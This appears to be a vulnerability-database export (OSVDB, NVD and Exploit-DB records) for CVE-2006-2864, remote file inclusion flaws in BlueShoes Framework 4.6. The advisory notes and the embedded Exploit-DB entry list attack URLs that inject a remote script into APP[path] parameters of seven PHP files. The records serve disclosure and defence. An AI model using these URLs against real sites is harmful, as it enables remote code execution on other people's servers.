{"type": "osvdb", "published": "2006-06-03T08:35:31", "href": "https://vulners.com/osvdb/OSVDB:26002", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 5.1}, "viewCount": 1, "edition": 1, "reporter": "Kacper(kacper1964@yahoo.pl)", "title": "BlueShoes Framework websearchengine/Bs_Wse_Profile.class.php APP[path][plugins] Variable Remote File Inclusion", "affectedSoftware": [{"operator": "eq", "version": "4.6", "name": "BlueShoes Framework"}, {"operator": "eq", "version": "4.5", "name": "BlueShoes Framework"}], "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2017-04-28T13:20:22", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2864"]}, {"type": "exploitdb", "idList": ["EDB-ID:1870"]}, {"type": "osvdb", "idList": ["OSVDB:26001"]}], "modified": "2017-04-28T13:20:22", "rev": 2}, "vulnersScore": 7.0}, "references": [], "id": "OSVDB:26002", "lastseen": "2017-04-28T13:20:22", "cvelist": ["CVE-2006-2864"], "modified": "2006-06-03T08:35:31", "description": "## Vulnerability Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]\n## References:\nVendor URL: http://www.blueshoes.org/\n[Secunia Advisory ID:20438](https://secuniaresearch.flexerasoftware.com/advisories/20438/)\n[Related OSVDB ID: 25999](https://vulners.com/osvdb/OSVDB:25999)\n[Related OSVDB ID: 26000](https://vulners.com/osvdb/OSVDB:26000)\n[Related OSVDB ID: 25998](https://vulners.com/osvdb/OSVDB:25998)\n[Related OSVDB ID: 25996](https://vulners.com/osvdb/OSVDB:25996)\n[Related OSVDB ID: 26001](https://vulners.com/osvdb/OSVDB:26001)\n[Related OSVDB ID: 25997](https://vulners.com/osvdb/OSVDB:25997)\nISS X-Force ID: 26908\nGeneric Exploit URL: http://milw0rm.com/exploits/1870\nFrSIRT Advisory: ADV-2006-2128\n[CVE-2006-2864](https://vulners.com/cve/CVE-2006-2864)\nBugtraq ID: 18261\n"}

{"cve": [{"lastseen": "2021-02-02T05:27:21", "description": "Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) APP[path][applications] parameter to (a) Bs_Faq.class.php, (2) APP[path][core] parameter to (b) fileBrowserInner.php, (c) file.php, and (d) viewer.php, and (e) Bs_ImageArchive.class.php, (3) GLOBALS[APP][path][core] parameter to (f) Bs_Ml_User.class.php, or (4) APP[path][plugins] parameter to (g) Bs_Wse_Profile.class.php.\nSuccessful exploitation requires that \"register_global\" is enabled.", "edition": 6, "cvss3": {}, "published": "2006-06-06T20:06:00", "title": "CVE-2006-2864", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2864"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:blueshoes:blueshoes_framework:4.5", "cpe:/a:blueshoes:blueshoes_framework:4.6"], "id": "CVE-2006-2864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2864", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:blueshoes:blueshoes_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:blueshoes:blueshoes_framework:4.5:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "cvelist": ["CVE-2006-2864"], "edition": 1, "description": "## Vulnerability Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to mailinglist/Bs_Ml_User.class.php not properly sanitizing user input supplied to the 'GLOBALS[APP][path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to mailinglist/Bs_Ml_User.class.php not properly sanitizing user input supplied to the 'GLOBALS[APP][path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]\n## References:\nVendor URL: http://www.blueshoes.org/\n[Secunia Advisory ID:20438](https://secuniaresearch.flexerasoftware.com/advisories/20438/)\n[Related OSVDB ID: 25999](https://vulners.com/osvdb/OSVDB:25999)\n[Related OSVDB ID: 26000](https://vulners.com/osvdb/OSVDB:26000)\n[Related OSVDB ID: 25998](https://vulners.com/osvdb/OSVDB:25998)\n[Related OSVDB ID: 25996](https://vulners.com/osvdb/OSVDB:25996)\n[Related OSVDB ID: 25997](https://vulners.com/osvdb/OSVDB:25997)\n[Related OSVDB ID: 26002](https://vulners.com/osvdb/OSVDB:26002)\nISS X-Force ID: 26908\nGeneric Exploit URL: http://milw0rm.com/exploits/1870\nFrSIRT Advisory: ADV-2006-2128\n[CVE-2006-2864](https://vulners.com/cve/CVE-2006-2864)\nBugtraq ID: 18261\n", "modified": "2006-06-03T08:35:31", "published": "2006-06-03T08:35:31", "href": "https://vulners.com/osvdb/OSVDB:26001", "id": "OSVDB:26001", "type": "osvdb", "title": "BlueShoes Framework mailinglist/Bs_Ml_User.class.php GLOBALS[APP][path][core] Variable Remote File Inclusion", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:02:54", "description": "BlueShoes Framework <= 4.6 Remote File Include Vulnerabilities. CVE-2006-2864. Webapps exploit for php platform", "published": "2006-06-03T00:00:00", "type": "exploitdb", "title": "BlueShoes Framework <= 4.6 - Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-2864"], "modified": "2006-06-03T00:00:00", "id": "EDB-ID:1870", "href": "https://www.exploit-db.com/exploits/1870/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ BlueShoes Framework 4.6 <= Remote File Include Vulnerability\n$$ Script site: http://www.blueshoes.org/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-06-03]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1870/"}]}